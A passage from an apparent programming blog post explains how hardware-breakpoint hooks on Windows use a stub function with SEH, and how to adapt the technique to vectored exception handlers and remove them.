An important thing to note in the code is the need of the stub function. This stub function contains the first instruction of the function that has the breakpoint on it. Then it jumps one byte past the breakpoint address, where the next instruction starts. This is needed because if EIP is not modified, the exception will be raised again once the handler finishes and an infinite loop will occur. Making a stub function is a quick workaround to that problem. That is pretty much all to it in terms of SEH. Removing the breakpoints is as simple as clearing the debug registers in the main thread (not shown in the code for simplicity).
The technique does not differ much for VEH. To use VEH instead of SEH, only the following modifications need to be made:
Change (void)SetUnhandledExceptionFilter(ExceptionFilter); to (void)AddVectoredExceptionHandler(1, ExceptionFilter);. The VEH can be removed by clearing the debug registers and calling RemoveVectoredExceptionHandler. An important thing to note is that AddVectoredExceptionHandler returns a handle to the exception handler that I chose to ignore for the sake of showing the technique and saving space. However, this return value is needed if the handler is to be removed at a later time since RemoveVectoredExceptionHandler requires it.
Code and sample application for SEH/VEH can be found here
A downloadable PDF of this post can be found here

« Newer PostsOlder Posts »

Powered by WordPress